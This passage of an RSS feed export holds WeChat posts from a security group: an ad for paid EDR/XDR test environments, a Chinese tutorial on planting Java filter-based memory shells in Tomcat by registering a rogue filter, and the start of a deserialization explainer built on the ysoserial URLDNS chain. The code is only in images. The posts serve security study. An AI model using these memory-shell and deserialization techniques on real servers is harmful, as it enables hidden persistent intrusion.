style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000556" data-ratio="0.5595667870036101" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=3c875020&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEySIf0wvOZJsGncq3QHicYptg4MgPhwZHVFyjUou82fsk6gxKP70geAFw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000557" data-ratio="0.246690734055355" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=e45e5a9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEy6xAiaAMvHbmOCQV9d6VQtJYJic0fYJg2CticRibqTeBtnC9dBeRQr0SHgg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">工具珍贵，拒绝白嫖。<br/></span></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">为提高全民网络安全技术水平，团队决定在星球内部提供中高级</span><span style="font-family:等线;">EDR</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">/XDR</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">测试环境</span><span style="font-family:等线;">，拒绝白嫖，不花钱？您还是玩数字吧。<br/></span></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;"><mpchecktext><br/></mpchecktext></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">Falcon</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">最新版</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000558" data-ratio="0.5595667870036101" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=5a50bc58&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyvjmfMJLqIt3xzPQYNMia5CFWzycrNTpDjJKCxsoSxia5hdVkdkCdZicrw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000559" data-ratio="0.5595667870036101" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=eb1eff9d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyLu5mjia1Gia976SUcoQl0HBnG8KxgqibMnou2v1Pib43B3m1M5zKVRFtIQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">S</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;">entinelOne</span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">最新版</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000560" data-ratio="0.5186522262334536" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=cc7efeca&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEy2Gjm9ZFPwEiazYODq2z0Qb0icoNY3dvrLpOhicOicXRzJ8LT6Ho3v7dMKQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">Elastic最新版</span><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000561" data-ratio="0.5703971119133574" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=e47ab160&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyPWNUHyibwM6tj0Kwrr5MLWtAxDL9bhGmEzkMibkXobfiaEic2GCVbFIn0g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">Kaspersky</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"> </span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">Endpoint</span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"> </span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">最新版</span><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000562" data-ratio="0.5631768953068592" data-s="300,640" style="" data-type="png" data-w="831" src="https://wechat2rss.xlab.app/img-proxy/?k=2b4234c6&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyICsMUgnUGt5lMAiaSn0vNajLiaMQbuWC0f6wQkePsZQSQscmUQZht2Wg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;">为了防止白嫖行为，星球设置了七天可见，通过后可以加入交流群平日交流学习</span><br/></span></p><p style="text-align: center;"><img class="rich_pages wxw-img" data-galleryid="" data-imgfileid="100000563" data-ratio="1.1107544141252006" data-s="300,640" style="" data-type="png" data-w="623" src="https://wechat2rss.xlab.app/img-proxy/?k=5f74a8a1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9c30aynvP5mTUXTMbff4PEyCB9dHqkUBhFDoQ0QXCQx9TqZgBa65mBwPnebXZsnDElKwZ2peQ6uiag%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><br/></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;"><mpchecktext><br/></mpchecktext></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"><span style="font-family:等线;"><mpchecktext><br/></mpchecktext></span></span><span style="mso-spacerun:&#39;yes&#39;;font-family:等线;mso-bidi-font-family:&#39;Times New Roman&#39;;font-size:10.5000pt;mso-font-kerning:1.0000pt;"></span></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484214">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=0590c643&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484214%26idx%3D1%26sn%3Dc33373076ebf836bb02269f1a1663002%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Fri, 28 Jun 2024 00:34:00 +0800</pubDate>
    </item>
    <item>
      <title>java内存马详解</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484171&amp;idx=1&amp;sn=9d50dc8af8137f32f0790639ec3758f9</link>
      <description>在讲过反序列化之后，在实战中可以发现很多场景都是通过反序列化植入内存马这种操作。</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2024-03-25 15:37</span> <span style="display: inline-block;">安徽</span>
</p>

<p>在讲过反序列化之后，在实战中可以发现很多场景都是通过反序列化植入内存马这种操作。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=2522ff8c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Df4qY4KCBHX5EnsDfEpkadI2NOVibvtftTWLG8dbUwUibdwpYzBd7MSoVg%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p><span>在讲过反序列化之后，在实战中可以发现很多场景都是通过反序列化植入内存马这种操作。</span></p><p><span>那么内存马的好处肯定不用多说了，但是内存马具体是怎么植入的呢，老规矩本人java也是自学，尽可能用人话给各位简单讲一下。</span></p><p><br/></p><h5 data-node-type="block" data-block-type="text"><p><span style="font-size: 24px;">filter</span></p></h5><p><span>在讲内存马之前，需要先知道下在java中存在一种叫filter的东西。</span></p><p><span>就是这个东西的存在实现了比如登录，鉴权等等骚操作。那么filter是啥？</span></p><p><span>通俗来讲，filter就是一个过滤器，在java中你访问的每个请求都会先通过判断是否存在于filter中再决定是否要进行放行。</span></p><p><span>在代码中的体现具体为。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000505" data-ratio="0.43764002987303957" data-w="1339" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=4c301667&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfVDDsEIwEy1KlScm3vWrmATQoVLyUib3E6xc4la4urkeQ0Q5qt1ub2Ig%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>在web.xml中注册了所有当前的filter</span></p><p><span>filter-name:表示当前filter的名称</span></p><p><span>filter-class：表示filter详细代码的类</span></p><p><span>url-pattern：表示要拦截的路径</span></p><p><span>再看filter的处理部分代码</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000506" data-ratio="0.38730723606168443" data-w="1686" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=9a9e26a0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfEKyrQHnEE4l6o4G4W8pjavibrgIcbrticHoDOWb2akAicr8eSz85ddbrg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>ok配置好后大致的filter功能有简单的理解了。那我们实际看一下filter是如何处理的。</span></p><p><span>下断点我们进入到了这里</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000507" data-ratio="0.6146916146916147" data-w="1443" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=ec0faf11&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfThicT5HHAnsHiaxqUAUw9p6BMbr0PyM0FVGr4FvyOcub2OoQaJ5Tacicg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>可以看到调用了filterChain的doFilter方法。查看下可以发现filterChain中存放的就是从web.xml中读取到的配置的filter</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000503" data-ratio="0.578544061302682" data-w="783" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=7242cedd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfINjA0lNK0ZUOj0y5tiaZB6eibxBFdl81UiaLeuj45Qj3uTZktxxDDyrfw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>既然filterChain已经存在了web.xml中的配置，我们就找下filterChain是怎么被创建的。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000504" data-ratio="0.02461322081575246" data-w="1422" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=3e5395bf&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfClib4SuuH2DgXropqIcnicvwC86JBjcFRu5ibBLDhMWOLD6EdRMPFyPww%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>通过代码我们发现filterChain的创建使用到了createFilterChain方法，看一下这个方法具体实现</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000511" data-ratio="0.328" height="130px" data-type="png" data-w="1875" src="https://wechat2rss.xlab.app/img-proxy/?k=be62ef47&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfLsSHj4tDe8IGMfYLnfJ5Ox3gG4fshgzDOKCczWBcqwnqcLJMLBlJ8A%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>跟进之后我们发现他在其中使用了findFilterMaps来查找你web.xml中所有的配置，并保存在filtermap中。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000508" data-ratio="0.11470281543274244" height="45px" data-type="png" data-w="959" src="https://wechat2rss.xlab.app/img-proxy/?k=a84a0fc3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfoDnWKFTUt2GJ5g6OibXeGhfBpqyFicNUibG3xWUxibkJ714b3mPibianWHibQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><img class="rich_pages wxw-img" data-imgfileid="100000512" data-ratio="0.4081796311146752" height="162px" data-type="png" data-w="1247" src="https://wechat2rss.xlab.app/img-proxy/?k=b34a2429&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfgNg6hhbSMSVCGbk1CCHhS0wiahADQxvHRicmiagBcxWukH113lLu8wZfA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>然后根据你请求的url在这个filtermap中依次对比，如果匹配到了就添加进入filterChain。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000510" data-ratio="0.09754433833560709" height="39px" data-type="png" data-w="1466" src="https://wechat2rss.xlab.app/img-proxy/?k=eb55cfb2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfGZMXLVoc8zKcoUREFJTOCIvib1YIUict3DxS7ibPqQodtyfy2OMya77Rg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>所以说，注册内存马其实就是注册一个我们自己的filter就可以了。</span></p><p><span>根据代码可知，注册我们的内存马，需要filterConfig这个东西。而filterConfig需要使用到context中的findFilterConfig进行创建。 再看下刚刚的findFilterMaps。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000509" data-ratio="0.06951026856240126" height="27px" data-type="png" data-w="633" src="https://wechat2rss.xlab.app/img-proxy/?k=35671f91&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Df9LhVIM3QsRJWMAMIszca8IwToQooPUbISGG1ica0h9LibS6d5SwCXZ7w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>可以看到一切的起源都和context有关系。</span></p><p><span>那我们就看一下context中具体的实现了什么。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000514" data-ratio="0.4482758620689655" height="178px" data-type="png" data-w="1131" src="https://wechat2rss.xlab.app/img-proxy/?k=66a4dc23&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Dflic38kwsfKS73AeicFsh7kZL388XRgnqcJYWHtglHb8XiajodJQfMw2eQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>直接看关键点，在context中存在直接添加进filtermap的方法，我们只需要直接调用，即可注册自己的filter</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000513" data-ratio="0.4149797570850202" height="165px" data-type="png" data-w="494" src="https://wechat2rss.xlab.app/img-proxy/?k=6520ce9f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DftnHUy1ricbuFowWxzUam9cqshRlLicnhCzvo0POibdicHK6pU9ib4OKdibzQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>在context中，和filter有关的我们需要注册这三个参数。</span></p><p><span>那么实际操作下看下怎么添加。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000518" data-ratio="0.7498171177761521" height="299px" data-type="png" data-w="1367" src="https://wechat2rss.xlab.app/img-proxy/?k=dadfe9a7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfcpEFGoiaMlXYM77NsUKmfpAHuicl8DKtowGZib3foUibZWHriaFy36sve1g%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>还记得开头讲的web.xml中的每个字段代表的含义吗。</span></p><p><span>和这里的字段就可以对应上了</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000516" data-ratio="0.6332703213610587" height="252px" data-type="png" data-w="1058" src="https://wechat2rss.xlab.app/img-proxy/?k=0db5b93f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Dfiafmu87VrBUNC0IN12OnI17HiaVaiaA9JooomBQSWE1F0m8IhdHfyx2Rw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>在filtermap中只需要对应上我们的name和url就可以了。</span></p><p><span>再看下def中需要对应哪些</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000515" data-ratio="0.24635036496350365" height="98px" data-type="png" data-w="1096" src="https://wechat2rss.xlab.app/img-proxy/?k=b2aba1c9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Df023b6qss8aOtrhr8lkYkuyK9VgDPZtrxApMU91wEo1oBq1HUfSJickg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>根据结果构造代码</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000519" data-ratio="0.41711229946524064" height="166px" data-type="png" data-w="561" src="https://wechat2rss.xlab.app/img-proxy/?k=2b3cca10&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8DfO1l2IM2v2pMdNGYGEAu0dyLQUWFjJzibFrKUBIbllBedYibgyX6PsNQA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>最后只需要把我们构造的def和map注入进去就可以了。</span></p><p><img class="rich_pages wxw-img" data-imgfileid="100000520" data-ratio="0.7095736122284795" height="282px" data-type="png" data-w="1243" src="https://wechat2rss.xlab.app/img-proxy/?k=6c100d35&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9dYDQia27mtcj9Cpcj4gI8Df0TDmC3FCaicrPhPRTZd6HZbWCfczCt5TPglPoaiaN9rzCamyFmFg0q8Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p><span>这样我们就成功获得了一个我们自己可控的filter</span></p><p><br/></p><p><br/></p><p><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247484171">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=a93d1413&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzk0ODUxNzgyOQ%3D%3D%26mid%3D2247484171%26idx%3D1%26sn%3D9d50dc8af8137f32f0790639ec3758f9%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 25 Mar 2024 15:37:00 +0800</pubDate>
    </item>
    <item>
      <title>反序列化详解</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzk0ODUxNzgyOQ==&amp;mid=2247484150&amp;idx=1&amp;sn=ddd749b70e11fb06c56354f1068c403a</link>
      <description>反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。</description>
      <content:encoded><![CDATA[<p>
原创 <span>41group</span> <span>2024-03-08 16:39</span> <span style="display: inline-block;">安徽</span>
</p>

<p>反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=23a5fb33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxEGRpVDWFWXXdrRkXFNEjNRNfT9tKL4enM62qhH7ibibG3ce5cYicV5Kqw%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<h1 data-node-type="block" data-block-type="text"><p>反序列化作为新生代比较亮点的漏洞，利用难度和理解难度相对来说在sql注入，越权这种常见漏洞相比还是比较困难的。网上文章呢对小白可能不是很好理解，今天这篇文章本人就尽量使用浅显易懂的方式给大家讲解一下。</p></h1><p><br/></p><p>首先反序列化是什么？</p><p>java反序列化是将序列化的对象转换回原始对象的一个过程。在Java中，序列化是指将对象转换为字节序列以便在网络上传输或保存到文件中。</p><p>反序列化则是将字节序列转换回对象的过程。通过反序列化，可以将之前序列化的对象重新恢复成原始的对象，实现对象的持久化和传输。</p><p>注意序列化后的对象时可以被用户随意处理的，包括网络传输或保存为文件，这也就奠定了反序列化漏洞的利用条件宽泛与否。<br/></p><p>那知道了序列化与反序列化的定义我们来看反序列化漏洞的前提是什么？</p><p>反序列化漏洞的产生一定要对方项目存在有高危风险的类库。（比如常见的cc库）</p><p>并且在代码中一定是调用了readObject方法尝试还原对象。</p><p>如果不存在这两点，基本就不会存在反序列化漏洞。</p><p><br/></p><h5 data-node-type="block" data-block-type="text"><p><span style="font-weight: bold;font-size: 24px;">URLDNS</span></p></h5><p>从urldns开始讲起，在反序列化中urldns是一条完美的适合用于快速检测的链，虽然他只能出发dns请求，但是其不需要依赖第三方类库的特性使其有超高的遍布性。</p><p>我们直接看yso中urldns的payload</p><p><img class="rich_pages wxw-img" data-imgfileid="100000482" data-ratio="0.5812854442344045" data-w="1058" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=9439200c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxFQlLMQlzxY4TCwxLSMicyWVKBA6uoWvVU9ibCFoXlkbjfU4I5xtIwt1w%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>反序列化漏洞中大家只需要记得最后return的是什么，入口点就是什么。所以在这段payload中入口点就是ht。</p><p>那么看ht他new了一个hashmap，这就说明他的入口和hashmap有很大的关联，所以我们直接跟进到hashmap中</p><p><img class="rich_pages wxw-img" data-imgfileid="100000481" data-ratio="0.7948316366483946" data-w="1277" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=045308da&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxU1AHDc55u6icQna2x3JXg5fosAzUxqzblbn8OW8VzKbOqjodbgXoskw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>进到hashmap还记得上面我说的吗，反序列化漏洞的存在必须其调用过readObject还原对象。所以我们通篇查询是否存在readObject。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000484" data-ratio="0.9627870150435471" data-w="1263" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=4c8433a3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxdvyeptFiaaHrNiaP0nhTY2HSMJP9nrPLRicmbvT3PdVZ2WEoShonxOTvQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>果然是存在的，那么这时候我们随便下个断点把，看看他具体在readObject都干了什么。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000480" data-ratio="0.3292750415052573" data-w="1807" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=277f1ca3&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxsKqrnYzKXJsTo9WqIQ5xmCgHmxfLHu0axAHoYnKxXZ3s91ZEH2S22Q%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>通过跟进代码我们发现他获取了两个参数key和value，并且在最后一行putval中，使用hash计算了key的哈希值。</p><p>直接跟进hashmap的hash进行查看。</p><p><img class="rich_pages wxw-img" data-imgfileid="100000479" data-ratio="0.22105263157894736" data-w="950" data-type="png" src="https://wechat2rss.xlab.app/img-proxy/?k=f18c5092&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FJfZvTUw4J9euavYDjkwZ0HibVtus9q9VxsO7ErWDBbuOK9HwbricsEEwqgnYygruGLOK4hObn0FG5vslibplpYDMA%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p>可以发现其传入了一个object类型参数key，在key为空时返回0，不为空时调用key下的hashcode进行处理。</p><p>我们有key参数，所以继续跟进</p><p><img class="rich_pages wxw-img" data-imgfileid="100000485" data-ratio="0.3685078318219291" data-w="1213" data-type="png" 